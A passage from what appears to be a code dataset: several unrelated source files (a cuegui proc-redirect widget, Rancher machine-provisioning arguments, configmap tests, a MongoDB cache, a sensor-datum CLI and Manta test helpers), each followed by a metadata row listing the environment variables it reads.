message.setText(msg)
message.exec_()
def __is_cross_show_safe(self, procs, target_show):
"""
Determines whether or not it's safe to redirect cores from a show
to another, based on user response to the warning message
@param procs: The procs to redirect
@type procs: L{opencue.wrappers.proc.Proc}
@param target_show: The name of the target show
@type target_show: str
@return: Whether or not it's safe to redirect the given procs to the
target show
@rtype: bool
"""
xshow_jobs = [proc.getJob() for proc in procs if not
proc.getJob().show() == target_show]
if not xshow_jobs:
return True # No cross-show procs
msg = ('Redirecting the selected procs to the target will result '
'in killing frames on other show/s.\nDo you have approval '
'from (%s) to redirect cores from the following jobs?'
% ', '.join([j.show().upper() for j in xshow_jobs]))
return cuegui.Utils.questionBoxYesNo(parent=self,
title="Cross-show Redirect!",
text=msg,
items=[j.name() for j
in xshow_jobs])
def __is_burst_safe(self, alloc, procs, show):
"""
Determines whether or not it's safe to redirect cores by checking the
burst target show burst and the number of cores being redirected. If
there's a number of cores that may not be possible to pick up by the
target show, that number should be lower than the threshold set in the
cue_resources config.
@param alloc: The name of the allocation for the cores
@type alloc: str
@param procs: The procs to be redirected
@type procs: L{opencue.wrappers.proc.Proc}
@param show: The name of the target show
@type show: str
@return: Whether or not it's safe to kill these cores based on
the subscription burst of the target show
@rtype: bool
"""
# Skip if this check is disabled in the config
# pylint: disable=protected-access
cfg = self.__controls._cfg()
# pylint: enable=protected-access
wc_ok = cfg.get('wasted_cores_threshold', 100)
if wc_ok < 0:
return True
show_obj = opencue.api.findShow(show)
show_subs = dict((s.data.name.rstrip('.%s' % show), s)
for s in show_obj.getSubscriptions()
if s.data.allocation_name in alloc)
try:
procs_to_burst = (show_subs.get(alloc).data.burst -
show_subs.get(alloc).data.reserved_cores)
procs_to_redirect = int(sum([p.data.reserved_cores
for p in procs]))
wasted_cores = int(procs_to_redirect - procs_to_burst)
if wasted_cores <= wc_ok:
return True # wasted cores won't exceed threshold
status = ('at burst' if procs_to_burst == 0 else
'%d cores %s burst'
% (procs_to_burst,
'below' if procs_to_burst > 0 else 'above'))
msg = ('Target show\'s %s subscription is %s. Redirecting '
'the selected procs will kill frames to free up %d '
'cores. You will be killing %d cores '
'that the target show will not be able to use. '
'Do you want to redirect anyway?'
% (alloc, status, int(procs_to_redirect), wasted_cores))
return cuegui.Utils.questionBoxYesNo(parent=self,
title=status.title(),
text=msg)
except TypeError:
self.__warn('Cannot redirect %s cores to %s because the '
'target show (%s) does not have a %s subscription!'
% (alloc, show, show, alloc))
return False
def redirect(self):
"""
Redirect the selected procs to the target job, after running a few
checks to verify it's safe to do that.
@postcondition: The selected procs are redirected to the target job
"""
# Get selected items
items = [self.__model.item(row) for row
in range(0, self.__model.rowCount())]
selected_items = [item for item in items
if item.checkState() == QtCore.Qt.Checked]
if not selected_items: # Nothing selected, exit
self.__warn('You have not selected anything to redirect.')
return
# Get the Target Job
job_name = self.__controls.getJob()
if not job_name: # No target job, exit
self.__warn('You must have a job name selected.')
return
job = None
try:
job = opencue.api.findJob(job_name)
except opencue.EntityNotFoundException: # Target job finished, exit
self.__warn('The job you\'re trying to redirect to '
'appears to be no longer in the cue!')
return
# Gather Selected Procs
procs_by_alloc = self.__get_selected_procs_by_alloc(selected_items)
show_name = job.show()
for alloc, procs in list(procs_by_alloc.items()):
if not self.__is_cross_show_safe(procs, show_name): # Cross-show
return
if not self.__is_burst_safe(alloc, procs, show_name): # At burst
return
# Redirect
errors = []
for item in selected_items:
entry = self.__hosts.get(str(item.text()))
procs = entry["procs"]
# pylint: disable=broad-except
try:
host = entry["host"]
host.redirectToJob(procs, job)
except Exception as e:
errors.append(str(e))
item.setIcon(QtGui.QIcon(QtGui.QPixmap(":retry.png")))
item.setEnabled(False)
if errors: # Something went wrong!
self.__warn('Some procs failed to redirect.')
def selectAll(self):
"""
Select all items in the results.
"""
for row in range(0, self.__model.rowCount()):
item = self.__model.item(row)
item.setCheckState(QtCore.Qt.Checked)
def clearTarget(self):
"""
Clear the target
"""
self.__controls.getJobBox().clear()
def update(self):
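"""Searches for procs that match the current filters and rebuilds the results tree, stopping at the configured limit."""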
self.__model.clear()
self.__model.setHorizontalHeaderLabels(RedirectWidget.HEADERS)
hosts = { }
ok = 0
service_filter = self.__controls.getRequiredService()
group_filter = self.__controls.getIncludedGroups()
job_regex = self.__controls.getJobNameExcludeRegex()
show = self.__controls.getShow()
alloc = self.__controls.getAllocFilter()
procs = opencue.api.getProcs(show=[str(show.data.name)], alloc=alloc.getSelected())
progress = QtWidgets.QProgressDialog("Searching","Cancel", 0,
self.__controls.getLimit(), self)
progress.setWindowModality(QtCore.Qt.WindowModal)
for proc in procs:
if progress.wasCanceled():
break
# Stick with the target show
if proc.data.show_name != show.data.name:
continue
if proc.data.job_name == str(self.__controls.getJob()):
continue
# Skip over already redirected procs
if proc.data.redirect_target:
continue
if ok >= self.__controls.getLimit():
break
if job_regex:
if re.match(job_regex, proc.data.job_name):
continue
if service_filter:
if service_filter not in proc.data.services:
continue
if group_filter:
if proc.data.group_name not in group_filter:
continue
name = proc.data.name.split("/")[0]
if name not in hosts:
cue_host = opencue.api.findHost(name)
hosts[name] = {
"host": cue_host,
"procs": [],
"mem": cue_host.data.idle_memory,
"cores": int(cue_host.data.idle_cores),
"time": 0,
"ok": False,
'alloc': cue_host.data.alloc_name}
host = hosts[name]
if host["ok"]:
continue
host["procs"].append(proc)
host["mem"] = host["mem"] + proc.data.reserved_memory
host["cores"] = host["cores"] + proc.data.reserved_cores
host["time"] = host["time"] + (int(time.time()) - proc.data.dispatch_time)
if host["cores"] >= self.__controls.getCores() and \
host["mem"] >= self.__controls.getMemory() and \
host["time"] < self.__controls.getCutoffTime():
self.__addHost(host)
host["ok"] = True
ok = ok + 1
progress.setValue(ok)
progress.setValue(self.__controls.getLimit())
# Save this for later on
self.__hosts = hosts
def __addHost(self, entry):
host = entry["host"]
procs = entry["procs"]
rtime = entry["time"]
checkbox = QtGui.QStandardItem(host.data.name)
checkbox.setCheckable(True)
self.__model.appendRow([checkbox,
QtGui.QStandardItem(str(entry["cores"])),
QtGui.QStandardItem("%0.2fGB" % (entry["mem"] / 1048576.0)),
QtGui.QStandardItem(cuegui.Utils.secondsToHHMMSS(rtime))])
for proc in procs:
checkbox.appendRow([QtGui.QStandardItem(proc.data.job_name),
QtGui.QStandardItem(str(proc.data.reserved_cores)),
QtGui.QStandardItem(
"%0.2fGB" % (proc.data.reserved_memory / 1048576.0)),
QtGui.QStandardItem(cuegui.Utils.secondsToHHMMSS(time.time() -
proc.data.dispatch_time)),
QtGui.QStandardItem(proc.data.group_name),
QtGui.QStandardItem(",".join(proc.data.services))])
self.__tree.setExpanded(self.__model.indexFromItem(checkbox), True)
self.__tree.resizeColumnToContents(0)
| [] | [] | ["SHOW"] | [] | ["SHOW"] | python | 1 | 0 | |
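The burst check in __is_burst_safe above reduces to simple arithmetic: the headroom left before the subscription bursts versus the cores a redirect would move. A minimal Python sketch of that calculation with hypothetical numbers (the helper and figures below are illustrative, not part of cuegui):

def wasted_cores(burst, reserved_by_show, cores_to_redirect):
    """Return how many redirected cores the target show could not use."""
    procs_to_burst = burst - reserved_by_show      # headroom left before burst
    return int(cores_to_redirect - procs_to_burst)

# Hypothetical subscription: bursts at 100 cores, 95 already reserved,
# and the selected procs hold 12 cores.
print(wasted_cores(burst=100, reserved_by_show=95, cores_to_redirect=12))  # -> 7 wasted cores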
pkg/controllers/provisioningv2/rke2/machineprovision/args.go
|
package machineprovision
import (
"fmt"
"os"
"regexp"
"sort"
"strings"
rkev1 "github.com/rancher/rancher/pkg/apis/rke.cattle.io/v1"
namespace2 "github.com/rancher/rancher/pkg/namespace"
"github.com/rancher/rancher/pkg/settings"
"github.com/rancher/wrangler/pkg/data"
"github.com/rancher/wrangler/pkg/data/convert"
corecontrollers "github.com/rancher/wrangler/pkg/generated/controllers/core/v1"
"github.com/rancher/wrangler/pkg/generic"
"github.com/rancher/wrangler/pkg/kv"
name2 "github.com/rancher/wrangler/pkg/name"
corev1 "k8s.io/api/core/v1"
apierror "k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime/schema"
capi "sigs.k8s.io/cluster-api/api/v1alpha4"
)
const (
CapiMachineLabel = "cluster.x-k8s.io/cluster-name"
)
var (
regExHyphen = regexp.MustCompile("([a-z])([A-Z])")
envNameOverride = map[string]string{
"amazonec2": "AWS",
"rackspace": "OS",
"openstack": "OS",
"vmwarevsphere": "VSPHERE",
"vmwarefusion": "FUSION",
"vmwarevcloudair": "VCLOUDAIR",
}
)
type driverArgs struct {
rkev1.RKEMachineStatus
DriverName string
ImageName string
ImagePullPolicy corev1.PullPolicy
EnvSecret *corev1.Secret
StateSecretName string
BootstrapSecretName string
BootstrapOptional bool
Args []string
}
func MachineStateSecretName(machineName string) string {
return name2.SafeConcatName(machineName, "machine", "state")
}
func (h *handler) getArgsEnvAndStatus(meta metav1.Object, data data.Object, args map[string]interface{}, driver string, create bool) (driverArgs, error) {
var (
url, hash, cloudCredentialSecretName string
)
nd, err := h.nodeDriverCache.Get(driver)
if !create && apierror.IsNotFound(err) {
url = data.String("status", "driverURL")
hash = data.String("status", "driverHash")
} else if err != nil {
return driverArgs{}, err
} else {
url = nd.Spec.URL
hash = nd.Spec.Checksum
}
if strings.HasPrefix(url, "local://") {
url = ""
hash = ""
}
secret := &corev1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: name2.SafeConcatName(meta.GetName(), "machine", "driver", "secret"),
Namespace: meta.GetNamespace(),
},
Data: map[string][]byte{
"HTTP_PROXY": []byte(os.Getenv("HTTP_PROXY")),
"HTTPS_PROXY": []byte(os.Getenv("HTTPS_PROXY")),
"NO_PROXY": []byte(os.Getenv("NO_PROXY")),
},
}
bootstrapName, cloudCredentialSecretName, secrets, err := h.getSecretData(meta, data, create)
if err != nil {
return driverArgs{}, err
}
for k, v := range secrets {
_, k = kv.RSplit(k, "-")
envName := envNameOverride[driver]
if envName == "" {
envName = driver
}
k := strings.ToUpper(envName + "_" + regExHyphen.ReplaceAllString(k, "${1}_${2}"))
secret.Data[k] = []byte(v)
}
secretName := MachineStateSecretName(meta.GetName())
cmd := []string{
fmt.Sprintf("--driver-download-url=%s", url),
fmt.Sprintf("--driver-hash=%s", hash),
fmt.Sprintf("--secret-namespace=%s", meta.GetNamespace()),
fmt.Sprintf("--secret-name=%s", secretName),
}
if create {
cmd = append(cmd, "create",
fmt.Sprintf("--driver=%s", driver),
fmt.Sprintf("--custom-install-script=/run/secrets/machine/value"))
rancherCluster, err := h.rancherClusterCache.Get(meta.GetNamespace(), meta.GetLabels()[CapiMachineLabel])
if err != nil {
return driverArgs{}, err
}
cmd = append(cmd, toArgs(driver, args, rancherCluster.Status.ClusterName)...)
} else {
cmd = append(cmd, "rm", "-y")
}
cmd = append(cmd, meta.GetName())
return driverArgs{
DriverName: driver,
ImageName: settings.PrefixPrivateRegistry(settings.MachineProvisionImage.Get()),
ImagePullPolicy: corev1.PullAlways,
EnvSecret: secret,
StateSecretName: secretName,
BootstrapSecretName: bootstrapName,
BootstrapOptional: !create,
Args: cmd,
RKEMachineStatus: rkev1.RKEMachineStatus{
Ready: data.String("spec", "providerID") != "" && data.Bool("status", "jobComplete"),
DriverHash: hash,
DriverURL: url,
CloudCredentialSecretName: cloudCredentialSecretName,
},
}, nil
}
func (h *handler) getBootstrapSecret(machine *capi.Machine) (string, error) {
if machine == nil || machine.Spec.Bootstrap.ConfigRef == nil {
return "", nil
}
gvk := schema.FromAPIVersionAndKind(machine.Spec.Bootstrap.ConfigRef.APIVersion,
machine.Spec.Bootstrap.ConfigRef.Kind)
bootstrap, err := h.dynamic.Get(gvk, machine.Namespace, machine.Spec.Bootstrap.ConfigRef.Name)
if apierror.IsNotFound(err) {
return "", nil
} else if err != nil {
return "", err
}
d, err := data.Convert(bootstrap)
if err != nil {
return "", err
}
return d.String("status", "dataSecretName"), nil
}
func (h *handler) getSecretData(meta metav1.Object, obj data.Object, create bool) (string, string, map[string]string, error) {
var (
err error
machine *capi.Machine
result = map[string]string{}
)
oldCredential := obj.String("status", "cloudCredentialSecretName")
cloudCredentialSecretName := obj.String("spec", "common", "cloudCredentialSecretName")
for _, ref := range meta.GetOwnerReferences() {
if ref.Kind != "Machine" {
continue
}
machine, err = h.machines.Get(meta.GetNamespace(), ref.Name)
if err != nil && !apierror.IsNotFound(err) {
return "", "", nil, err
}
}
if machine == nil && create {
return "", "", nil, generic.ErrSkip
}
if cloudCredentialSecretName == "" {
cloudCredentialSecretName = oldCredential
}
if cloudCredentialSecretName != "" {
secret, err := GetCloudCredentialSecret(h.secrets, meta.GetNamespace(), cloudCredentialSecretName)
if err != nil {
return "", "", nil, err
}
for k, v := range secret.Data {
result[k] = string(v)
}
}
bootstrapName, err := h.getBootstrapSecret(machine)
if err != nil {
return "", "", nil, err
}
return bootstrapName, cloudCredentialSecretName, result, nil
}
func GetCloudCredentialSecret(secrets corecontrollers.SecretCache, namespace, name string) (*corev1.Secret, error) {
globalNS, globalName := kv.Split(name, ":")
if globalName != "" && globalNS == namespace2.GlobalNamespace {
return secrets.Get(globalNS, globalName)
}
return secrets.Get(namespace, name)
}
func toArgs(driverName string, args map[string]interface{}, clusterID string) (cmd []string) {
if driverName == "amazonec2" {
tagValue := fmt.Sprintf("kubernetes.io/cluster/%s,owned", clusterID)
if tags, ok := args["tags"]; !ok || convert.ToString(tags) == "" {
args["tags"] = tagValue
} else {
args["tags"] = convert.ToString(tags) + "," + tagValue
}
}
for k, v := range args {
dmField := "--" + driverName + "-" + strings.ToLower(regExHyphen.ReplaceAllString(k, "${1}-${2}"))
if v == nil {
continue
}
switch v.(type) {
case float64:
cmd = append(cmd, fmt.Sprintf("%s=%v", dmField, v))
case string:
if v.(string) != "" {
cmd = append(cmd, fmt.Sprintf("%s=%s", dmField, v.(string)))
}
case bool:
if v.(bool) {
cmd = append(cmd, dmField)
}
case []interface{}:
for _, s := range v.([]interface{}) {
if _, ok := s.(string); ok {
cmd = append(cmd, fmt.Sprintf("%s=%s", dmField, s.(string)))
}
}
}
}
if driverName == "amazonec2" &&
convert.ToString(args["securityGroup"]) != "rancher-nodes" &&
args["securityGroupReadonly"] == nil {
cmd = append(cmd, "--amazonec2-security-group-readonly")
}
sort.Strings(cmd)
return
}
func getNodeDriverName(typeMeta meta.Type) string {
return strings.ToLower(strings.TrimSuffix(typeMeta.GetKind(), "Machine"))
}
| ["\"HTTP_PROXY\"", "\"HTTPS_PROXY\"", "\"NO_PROXY\""] | [] | ["HTTP_PROXY", "HTTPS_PROXY", "NO_PROXY"] | [] | ["HTTP_PROXY", "HTTPS_PROXY", "NO_PROXY"] | go | 3 | 0 | |
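toArgs above derives machine-driver CLI flags from camelCase argument names via regExHyphen. A rough Python sketch of the same naming rule (illustrative only, not the Rancher code path):

import re

_hyphen = re.compile(r"([a-z])([A-Z])")

def to_flag(driver, key):
    """camelCase key -> --driver-kebab-case flag, mirroring regExHyphen above."""
    return "--" + driver + "-" + _hyphen.sub(r"\1-\2", key).lower()

print(to_flag("amazonec2", "securityGroupReadonly"))  # --amazonec2-security-group-readonly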
source/configmap/configmap_test.go
|
package configmap
import (
"encoding/json"
"fmt"
"os"
"reflect"
"testing"
"github.com/goasana/config"
)
func TestGetClient(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
localCfg := os.Getenv("HOME") + "/.kube/config"
tt := []struct {
name string
cfgpath string
error string
isIncluster bool
assert string
}{
{name: "fail loading incluster kubeconfig, from external", error: "unable to load in-cluster configuration, KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT must be defined", isIncluster: false},
{name: "fail loading external kubeconfig", cfgpath: "/invalid/path", error: "stat /invalid/path: no such file or directory", isIncluster: false},
{name: "loading an incluster kubeconfig", cfgpath: "", error: "", isIncluster: true, assert: "open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory"},
{name: "loading kubeconfig from external", cfgpath: localCfg, isIncluster: false},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
if tc.isIncluster {
os.Setenv("KUBERNETES_SERVICE_HOST", "127.0.0.1")
os.Setenv("KUBERNETES_SERVICE_PORT", "443")
} else {
os.Unsetenv("KUBERNETES_SERVICE_HOST")
os.Unsetenv("KUBERNETES_SERVICE_PORT")
}
_, err := getClient(tc.cfgpath)
if err != nil {
if err.Error() == tc.error {
return
}
if err.Error() == tc.assert {
return
}
t.Errorf("found an unhandled error: %v", err)
}
})
}
os.Unsetenv("KUBERNETES_SERVICE_HOST")
os.Unsetenv("KUBERNETES_SERVICE_PORT")
}
func TestMakeMap(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
tt := []struct {
name string
din map[string]string
dout map[string]interface{}
jdout []byte
}{
{
name: "simple valid data",
din: map[string]string{
"foo": "bar=bazz",
},
dout: map[string]interface{}{
"foo": map[string]interface{}{
"bar": "bazz",
},
},
jdout: []byte(`{"foo":{"bar":"bazz"}}`),
},
{
name: "complex valid data",
din: map[string]string{
"mongodb": "host=127.0.0.1\nport=27017\nuser=user\npassword=password",
"config": "host=0.0.0.0\nport=1337",
"redis": "url=redis://127.0.0.1:6379/db01",
},
dout: map[string]interface{}{
"mongodb": map[string]interface{}{
"host": "127.0.0.1",
"port": "27017",
"user": "user",
"password": "password",
},
"config": map[string]interface{}{
"host": "0.0.0.0",
"port": "1337",
},
"redis": map[string]interface{}{
"url": "redis://127.0.0.1:6379/db01",
},
},
jdout: []byte(`{"config":{"host":"0.0.0.0","port":"1337"},"mongodb":{"host":"127.0.0.1","password":"password","port":"27017","user":"user"},"redis":{"url":"redis://127.0.0.1:6379/db01"}}`),
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
dout := makeMap(tc.din)
jdout, _ := json.Marshal(dout)
if eq := reflect.DeepEqual(dout, tc.dout); !eq {
fmt.Println(eq)
t.Fatalf("expected %v and got %v", tc.dout, dout)
}
if string(jdout) != string(tc.jdout) {
t.Fatalf("expected %v and got %v", string(tc.jdout), string(jdout))
}
})
}
}
func TestConfigmap_Read(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
data := []byte(`{"config":{"host":"0.0.0.0","port":"1337"},"mongodb":{"host":"127.0.0.1","password":"password","port":"27017","user":"user"},"redis":{"url":"redis://127.0.0.1:6379/db01"}}`)
tt := []struct {
name string
sname string
namespace string
}{
{name: "read data with source default values", sname: DefaultName, namespace: DefaultNamespace},
{name: "read data with source with custom configmap name", sname: "asana-config", namespace: DefaultNamespace},
{name: "read data with source with custom namespace", sname: DefaultName, namespace: "kube-public"},
{name: "read data with source with custom configmap name and namespace", sname: "asana-config", namespace: "kube-public"},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
source := NewSource(
WithName(tc.sname),
WithNamespace(tc.namespace),
)
r, err := source.Read()
if err != nil {
t.Errorf("not able to read the config values because: %v", err)
return
}
if string(r.Data) != string(data) {
t.Logf("data expected: %v", string(data))
t.Logf("data got from configmap: %v", string(r.Data))
t.Errorf("data from configmap does not match.")
}
})
}
}
func TestConfigmap_String(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
source := NewSource()
if source.String() != "configmap" {
t.Errorf("expecting to get %v and instead got %v", "configmap", source)
}
}
func TestNewSource(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
conf := config.NewConfig()
conf.Load(NewSource())
if mongodbHost := conf.Get("mongodb", "host").String("localhost"); mongodbHost != "127.0.0.1" {
t.Errorf("expected %v and got %v", "127.0.0.1", mongodbHost)
}
if configPort := conf.Get("config", "port").Int(1337); configPort != 1337 {
t.Errorf("expected %v and got %v", "1337", configPort)
}
}
| ["\"TRAVIS\"", "\"HOME\"", "\"TRAVIS\"", "\"TRAVIS\"", "\"TRAVIS\"", "\"TRAVIS\""] | [] | ["HOME", "TRAVIS"] | [] | ["HOME", "TRAVIS"] | go | 2 | 0 | |
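makeMap, exercised by the test above, parses each ConfigMap value as newline-separated key=value pairs into a nested map. A small Python equivalent of that step, shown only to illustrate the transformation (not the goasana/config implementation):

def make_map(data):
    """Turn {'config': 'host=0.0.0.0\nport=1337'} into nested dicts."""
    out = {}
    for name, blob in data.items():
        out[name] = dict(line.split("=", 1) for line in blob.splitlines() if line)
    return out

print(make_map({"config": "host=0.0.0.0\nport=1337"}))
# {'config': {'host': '0.0.0.0', 'port': '1337'}}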
macchiato.go
|
package macchiato
import (
"os"
"log"
"bytes"
"errors"
"strings"
"context"
"reflect"
"encoding/gob"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
)
type Cache struct {
client *mongo.Client
collection *mongo.Collection
Gob string
}
type Config struct {
MongoURI string
Database string
Collection string
}
type CacheCast struct {
Interface interface{}
}
type CacheDB struct {
ID string `bson:"id"`
Content []byte `bson:"content"`
Type string `bson:"type"`
}
func (c *Cache) Register(i interface{}) {
gob.Register(i)
}
func NewCache(config *Config) (*Cache, error) {
var err error
var database string
var collection string
var cache Cache
//We will register in gob our fake struct
gob.Register(CacheCast{})
	if (config.MongoURI == "") {
		err = errors.New("Mongo URI cannot be empty")
		return &Cache{}, err
	}
//If Database is null, we will use "macchiato" as default
if (config.Database == "") {
database = "macchiato"
} else {
database = config.Database
}
//If Collection is null, we will use "cache" as default
if (config.Collection == "") {
collection = "cache"
} else {
collection = config.Collection
}
//Preparing client
clientOptions := options.Client().ApplyURI(os.Getenv("MONGO_URI"))
cache.client, err = mongo.Connect(context.TODO(), clientOptions)
if err != nil {
return &Cache{}, err
}
//We will test now the DB
err = cache.client.Ping(context.TODO(), nil)
if err != nil {
return &Cache{}, err
}
//Now we will set the collection
cache.collection = cache.client.Database(database).Collection(collection)
return &cache, nil
}
func (c *Cache) Disconnect() error {
err := c.client.Disconnect(context.TODO())
return err
}
func (c *Cache) RawGet(s string) ([]byte, bool) {
var found bool
var err error
var result []byte
var resultDB CacheDB
err = c.collection.FindOne(context.TODO(), bson.M{ "id": s }).Decode(&resultDB)
if err != nil {
if ! (strings.Contains(err.Error(), "no documents")) {
return nil, false
}
}
if (resultDB.ID != "") {
found = true
result = resultDB.Content
}
return result, found
}
func (c *Cache) Get(s string) (interface{}, bool) {
var found bool
var err error
var b bytes.Buffer
var result interface{}
var resultDB CacheDB
err = c.collection.FindOne(context.TODO(), bson.M{ "id": s }).Decode(&resultDB)
if err != nil {
if ! (strings.Contains(err.Error(), "no documents")) {
return nil, false
}
}
if (resultDB.ID != "") {
found = true
b.Write(resultDB.Content)
d := gob.NewDecoder(&b)
var resultTmp CacheCast
err = d.Decode(&resultTmp)
if err != nil {
log.Println("ERROR", err)
return nil, false
}
result = resultTmp.Interface
}
return result, found
}
func (c *Cache) RawSet(s string, i []byte, n int) (error) {
var resultDB CacheDB
var err error
resultDB.ID = s
resultDB.Content = i
upFilter := bson.M{
"$and": bson.A{
bson.M{
"id": bson.M{
"$eq": resultDB.ID,
},
},
},
}
upMsg := bson.M{
"$set": resultDB,
}
_, err = c.collection.UpdateMany(context.TODO(), upFilter, upMsg, options.Update().SetUpsert(true))
return err
}
func (c *Cache) Set(s string, i interface{}, n int) (error) {
var b bytes.Buffer
var resultDB CacheDB
var err error
e := gob.NewEncoder(&b)
	err = e.Encode(CacheCast{Interface: i})
if err != nil {
return err
}
resultDB.ID = s
resultDB.Type = reflect.TypeOf(i).String()
resultDB.Content = b.Bytes()
upFilter := bson.M{
"$and": bson.A{
bson.M{
"id": bson.M{
"$eq": resultDB.ID,
},
},
},
}
upMsg := bson.M{
"$set": resultDB,
}
_, err = c.collection.UpdateMany(context.TODO(), upFilter, upMsg, options.Update().SetUpsert(true))
return err
}
func (c *Cache) Del(s string) (error) {
_, err := c.collection.DeleteMany(context.TODO(), bson.M{ "id": s })
if err != nil {
return err
}
return err
}
| ["\"MONGO_URI\""] | [] | ["MONGO_URI"] | [] | ["MONGO_URI"] | go | 1 | 0 | |
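Set and RawSet above persist each cache entry with an upsert keyed on id, so repeated writes overwrite rather than duplicate documents. A minimal pymongo sketch of the same pattern (pymongo and the URI below are assumptions; the Go code uses the official mongo-driver):

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")   # hypothetical URI
cache = client["macchiato"]["cache"]                # defaults used by NewCache

def set_entry(key, payload):
    # $set with upsert=True mirrors UpdateMany(..., options.Update().SetUpsert(true))
    cache.update_many({"id": key}, {"$set": {"id": key, "content": payload}}, upsert=True)

set_entry("greeting", b"hello")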
cmd/create_datum.go
|
package cmd
import (
"errors"
"fmt"
"os"
"strconv"
"github.com/spf13/cobra"
"github.com/growlog/things-server/internal/models"
)
func init() {
rootCmd.AddCommand(createFloatDatumCmd)
}
var createFloatDatumCmd = &cobra.Command{
Use: "create_datum [FIELDS]",
Short: "Create time-series (float) datum.",
Long: `Command used to create a single time series (float) datum for the particular sensor.`,
Args: func(cmd *cobra.Command, args []string) error {
if len(args) < 4 {
return errors.New("requires the following fields: tenantId, sensorId, value, timestamp")
}
return nil
},
Run: func(cmd *cobra.Command, args []string) {
// Get our user arguments.
tenantIdString := args[0]
sensorIdString := args[1]
valueString := args[2]
timestampString := args[3]
// Minor modifications.
tenantId, _ := strconv.ParseInt(tenantIdString, 10, 64)
sensorId, _ := strconv.ParseInt(sensorIdString, 10, 64)
value, _ := strconv.ParseFloat(valueString, 64) // create `float64` primitive
timestamp, _ := strconv.ParseInt(timestampString, 10, 64)
// Load up our `environment variables` from our operating system.
dbHost := os.Getenv("GROWLOG_THING_DB_HOST")
dbPort := os.Getenv("GROWLOG_THING_DB_PORT")
dbUser := os.Getenv("GROWLOG_THING_DB_USER")
dbPassword := os.Getenv("GROWLOG_THING_DB_PASSWORD")
dbName := os.Getenv("GROWLOG_THING_DB_NAME")
// Initialize and connect our database layer for the command.
dal := models.InitDataAccessLayer(dbHost, dbPort, dbUser, dbPassword, dbName)
dal.CreateThingTable(false)
dal.CreateSensorTable(false)
dal.CreateTimeSeriesDatumTable(false)
datum, err := dal.CreateTimeSeriesDatum(tenantId, sensorId, value, timestamp)
if err != nil {
fmt.Println("Failed creating time-series (float) datum!")
fmt.Println(err)
} else {
fmt.Println("Time-series (float) datum created with ID #", datum.Id)
}
},
}
| ["\"GROWLOG_THING_DB_HOST\"", "\"GROWLOG_THING_DB_PORT\"", "\"GROWLOG_THING_DB_USER\"", "\"GROWLOG_THING_DB_PASSWORD\"", "\"GROWLOG_THING_DB_NAME\""] | [] | ["GROWLOG_THING_DB_HOST", "GROWLOG_THING_DB_USER", "GROWLOG_THING_DB_PASSWORD", "GROWLOG_THING_DB_PORT", "GROWLOG_THING_DB_NAME"] | [] | ["GROWLOG_THING_DB_HOST", "GROWLOG_THING_DB_USER", "GROWLOG_THING_DB_PASSWORD", "GROWLOG_THING_DB_PORT", "GROWLOG_THING_DB_NAME"] | go | 5 | 0 | |
test/common.py
|
#!/usr/bin/env python
# Copyright (c) 2012 Joyent, Inc. All rights reserved.
"""Shared code for test case files."""
__all__ = ["stor", "MantaTestCase"]
import sys
import os
from posixpath import join as ujoin
import unittest
import subprocess
from subprocess import PIPE
import manta
#---- exports
def stor(*subpaths):
MANTA_USER = os.environ['MANTA_USER']
if not subpaths:
return '/%s/stor' % MANTA_USER
subpath = ujoin(*subpaths)
if subpath.startswith("/"):
subpath = subpath[1:]
return "/%s/stor/%s" % (MANTA_USER, subpath)
class MantaTestCase(unittest.TestCase):
def __init__(self, *args):
self.account = os.environ["MANTA_USER"]
self.subuser = os.environ.get("MANTA_SUBUSER", None)
self.role = os.environ.get("MANTA_ROLE", None)
unittest.TestCase.__init__(self, *args)
_client = None
def get_client(self):
MANTA_URL = os.environ['MANTA_URL']
MANTA_KEY_ID = os.environ['MANTA_KEY_ID']
MANTA_TLS_INSECURE = bool(os.environ.get('MANTA_TLS_INSECURE', False))
if not self._client:
signer = manta.CLISigner(key_id=MANTA_KEY_ID)
self._client = manta.MantaClient(url=MANTA_URL,
account=self.account,
subuser=self.subuser,
role=self.role,
signer=signer,
# Uncomment this for verbose client output for test run.
#verbose=True,
disable_ssl_certificate_validation=MANTA_TLS_INSECURE)
return self._client
def mantash(self, args):
mantash = os.path.realpath(
os.path.join(os.path.dirname(__file__), "..", "bin", "mantash"))
argv = [sys.executable, mantash]
MANTA_INSECURE = bool(os.environ.get('MANTA_INSECURE', False))
if MANTA_INSECURE:
argv.append('-k')
argv += args
p = subprocess.Popen(argv, shell=False, stdout=PIPE, stderr=PIPE,
close_fds=True)
p.wait()
stdout = p.stdout.read()
stderr = p.stderr.read()
code = p.returncode
return code, stdout, stderr
| [] | [] | ["MANTA_SUBUSER", "MANTA_KEY_ID", "MANTA_INSECURE", "MANTA_URL", "MANTA_USER", "MANTA_TLS_INSECURE", "MANTA_ROLE"] | [] | ["MANTA_SUBUSER", "MANTA_KEY_ID", "MANTA_INSECURE", "MANTA_URL", "MANTA_USER", "MANTA_TLS_INSECURE", "MANTA_ROLE"] | python | 7 | 0 | |
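The stor helper above only prefixes subpaths with /<MANTA_USER>/stor. A quick sketch of the expected outputs, assuming MANTA_USER=alice (the account name is hypothetical, not part of the original test suite):

import os

os.environ["MANTA_USER"] = "alice"   # hypothetical account name

# stor()               -> /alice/stor
# stor("tmp", "a.txt") -> /alice/stor/tmp/a.txt
# stor("/tmp/a.txt")   -> /alice/stor/tmp/a.txt  (leading slash is stripped)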
controllers/storagecluster/storagecluster_controller.go
|
package storagecluster
import (
"fmt"
"os"
"github.com/go-logr/logr"
